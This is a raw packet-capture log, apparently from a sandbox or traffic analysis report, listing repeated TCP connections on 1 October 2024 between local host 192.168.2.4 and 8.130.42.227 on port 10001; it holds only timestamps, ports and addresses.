                                                                Oct 1, 2024 09:20:09.311163902 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:09.315973997 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271895885 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271919966 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.271995068 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.271995068 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.272136927 CEST4989810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.276880980 CEST10001498988.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.387017965 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.391904116 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:10.395035028 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.395035028 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:10.399781942 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341918945 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341950893 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.341983080 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.342025042 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.342158079 CEST4989910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.347110033 CEST10001498998.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.446712017 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.451651096 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:11.451711893 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.451873064 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:11.456873894 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189773083 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189790964 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189799070 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189832926 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.189853907 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.189862013 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.189945936 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.190032959 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.190267086 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.190309048 CEST4990010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.194823980 CEST10001499008.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.305838108 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.311408997 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:13.311480045 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.311741114 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:13.316529989 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.260688066 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.260705948 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.262970924 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.263323069 CEST4990110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.268138885 CEST10001499018.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.370795012 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.375701904 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:14.375816107 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.376152992 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:14.380965948 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316540956 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316608906 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.316695929 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.316751957 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.431149960 CEST4990210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.431533098 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.436069012 CEST10001499028.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.436342955 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:15.436404943 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.436541080 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:15.441385984 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386439085 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386522055 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.386558056 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.386657953 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.387260914 CEST4990310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.391973019 CEST10001499038.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.494899988 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.500097036 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:16.503771067 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.508677959 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:16.513549089 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480326891 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480350971 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.480377913 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.480420113 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.480540991 CEST4990410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.485311985 CEST10001499048.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.587330103 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.592261076 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:17.592402935 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.592514038 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:17.597457886 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.552865982 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.553081036 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.554730892 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.554842949 CEST4990510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.559546947 CEST10001499058.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.667119980 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.672065020 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:18.674936056 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.675146103 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:18.680094957 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621520042 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621536970 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.621581078 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.621625900 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.621716022 CEST4990610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.626662016 CEST10001499068.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.727452040 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.732328892 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:19.732408047 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.732541084 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:19.737292051 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232091904 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232158899 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.232177973 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.232239962 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.233416080 CEST4990710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.239135981 CEST10001499078.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.342607975 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.347461939 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:21.347536087 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.347673893 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:21.352389097 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.302875996 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.302896023 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.303033113 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.303251982 CEST4990810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.308039904 CEST10001499088.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.414669037 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.419564962 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:22.419672012 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.422744036 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:22.427520990 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376581907 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376625061 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.376703978 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.377223969 CEST4990910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.382055044 CEST10001499098.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.525474072 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.530338049 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:23.530402899 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.537033081 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:23.541837931 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495697021 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495714903 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.495820999 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.495928049 CEST4991010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.500735998 CEST10001499108.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.602195024 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.607132912 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:24.607256889 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.607516050 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:24.612250090 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565737963 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565769911 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.565804958 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.565840960 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.565965891 CEST4991110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.570672989 CEST10001499118.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.680414915 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.685451984 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:25.685534954 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.685694933 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:25.690689087 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.658602953 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.658710957 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.660846949 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:26.660847902 CEST4991210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:26.665776014 CEST10001499128.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.779694080 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:26.784537077 CEST10001499138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:26.788779974 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:26.789103985 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:26.794012070 CEST10001499138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:27.739836931 CEST10001499138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:27.739859104 CEST10001499138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:27.739974022 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.739974022 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.740053892 CEST4991310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.744780064 CEST10001499138.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:27.856751919 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.861753941 CEST10001499148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:27.862903118 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.862903118 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:27.867645025 CEST10001499148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:28.809751987 CEST10001499148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:28.809784889 CEST10001499148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:28.809815884 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:28.809844017 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:28.815594912 CEST4991410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:28.820373058 CEST10001499148.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:28.993956089 CEST4991510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:28.999311924 CEST10001499158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:28.999404907 CEST4991510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:29.001604080 CEST4991510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:29.006436110 CEST10001499158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:29.972762108 CEST10001499158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:29.972779036 CEST10001499158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:29.972968102 CEST4991510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:29.972969055 CEST4991510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:29.977881908 CEST10001499158.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:30.086734056 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:30.091573000 CEST10001499168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:30.092803955 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:30.095696926 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:30.100545883 CEST10001499168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:31.062701941 CEST10001499168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:31.062719107 CEST10001499168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:31.062762976 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.062815905 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.062957048 CEST4991610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.067770958 CEST10001499168.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:31.181349039 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.186196089 CEST10001499178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:31.186264992 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.186388969 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:31.191298008 CEST10001499178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:32.150697947 CEST10001499178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:32.150774956 CEST10001499178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:32.150804996 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.152014017 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.258371115 CEST4991710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.258371115 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.263192892 CEST10001499178.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:32.263205051 CEST10001499188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:32.268914938 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.268914938 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:32.273668051 CEST10001499188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:36.248655081 CEST10001499188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:36.248804092 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.248831987 CEST10001499188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:36.248961926 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.248961926 CEST4991810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.253690958 CEST10001499188.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:36.356673956 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.361541986 CEST10001499198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:36.361932993 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.361932993 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:36.366714001 CEST10001499198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:37.334450960 CEST10001499198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:37.334467888 CEST10001499198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:37.336699963 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.336699963 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.336699963 CEST4991910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.341686964 CEST10001499198.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:37.447319984 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.452183008 CEST10001499208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:37.452244997 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.452404022 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:37.457139969 CEST10001499208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:38.408791065 CEST10001499208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:38.408828974 CEST10001499208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:38.408915997 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.408915997 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.411422014 CEST4992010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.416882038 CEST10001499208.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:38.523910046 CEST4992110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.528776884 CEST10001499218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:38.532877922 CEST4992110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.532877922 CEST4992110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:38.537662029 CEST10001499218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:40.071238041 CEST10001499218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:40.071258068 CEST10001499218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:40.072859049 CEST4992110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:40.072859049 CEST4992110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:40.077713013 CEST10001499218.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:40.180711031 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:40.185560942 CEST10001499228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:40.188755035 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:40.188918114 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:40.193634987 CEST10001499228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:41.148650885 CEST10001499228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:41.148680925 CEST10001499228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:41.148706913 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.148756027 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.148879051 CEST4992210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.153623104 CEST10001499228.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:41.265944004 CEST4992310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.270796061 CEST10001499238.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:41.270855904 CEST4992310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.271111965 CEST4992310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:41.275892019 CEST10001499238.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:42.227127075 CEST10001499238.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:42.227142096 CEST10001499238.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:42.228856087 CEST4992310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:42.228856087 CEST4992310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:42.233665943 CEST10001499238.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:42.336700916 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:42.341578960 CEST10001499248.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:42.344750881 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:42.344918013 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:42.349898100 CEST10001499248.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:43.308608055 CEST10001499248.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:43.308625937 CEST10001499248.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:43.308659077 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.308690071 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.308806896 CEST4992410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.313503027 CEST10001499248.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:43.415663004 CEST4992510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.421137094 CEST10001499258.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:43.421247005 CEST4992510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.421344042 CEST4992510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:43.426055908 CEST10001499258.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:44.386923075 CEST10001499258.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:44.386986017 CEST10001499258.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:44.388802052 CEST4992510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:44.389024019 CEST4992510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:44.393793106 CEST10001499258.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:44.492717028 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:44.497526884 CEST10001499268.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:44.500859976 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:44.500859976 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:44.505661011 CEST10001499268.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:45.452908039 CEST10001499268.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:45.452970982 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.453058958 CEST10001499268.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:45.453104019 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.453210115 CEST4992610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.457895041 CEST10001499268.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:45.571404934 CEST4992710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.576431036 CEST10001499278.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:45.576527119 CEST4992710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.576729059 CEST4992710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:45.581660986 CEST10001499278.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:46.529201031 CEST10001499278.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:46.529232025 CEST10001499278.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:46.532833099 CEST4992710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:46.532833099 CEST4992710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:46.537642002 CEST10001499278.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:46.652708054 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:46.657515049 CEST10001499288.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:46.660891056 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:46.660891056 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:46.665798903 CEST10001499288.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:47.631664991 CEST10001499288.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:47.631726027 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:47.631743908 CEST10001499288.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:47.631794930 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:47.631911039 CEST4992810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:20:47.636615992 CEST10001499288.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:20:47.743280888 CEST4992910001192.168.2.48.130.42.227
